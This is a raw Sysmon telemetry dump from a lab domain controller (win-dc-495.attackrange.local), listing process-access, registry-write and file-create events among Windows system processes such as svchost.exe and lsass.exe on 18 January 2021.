13:33:58.893{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.893{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.893{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.893{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1300-00000000A301}1280C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.861{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000001) 13241300x8000000000000000971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.846{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\srvnet\Parameters\MajorSequenceDWORD (0x000001a3) 13241300x8000000000000000970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.846{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 11241100x8000000000000000969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10532021-01-18 13:33:58.830{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeC:\Windows\Tasks\SA.DAT2016-09-12 11:34:03.403 13241300x8000000000000000968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.830{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{dea2c7f1-98ff-44fe-986c-3ff3dfaedd2b}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x8000000000000000967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.830{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{dea2c7f1-98ff-44fe-986c-3ff3dfaedd2b}\LastProbeTimeDWORD (0x60058e46) 13241300x8000000000000000966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.830{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{DEA2C7F1-98FF-44FE-986C-3FF3DFAEDD2B}\DateLastConnectedBinary Data 10341000x8000000000000000965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.814{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.814{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.814{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x8000000000000000962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.814{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x8000000000000000961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.814{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.814{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.799{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.783{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x8000000000000000949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 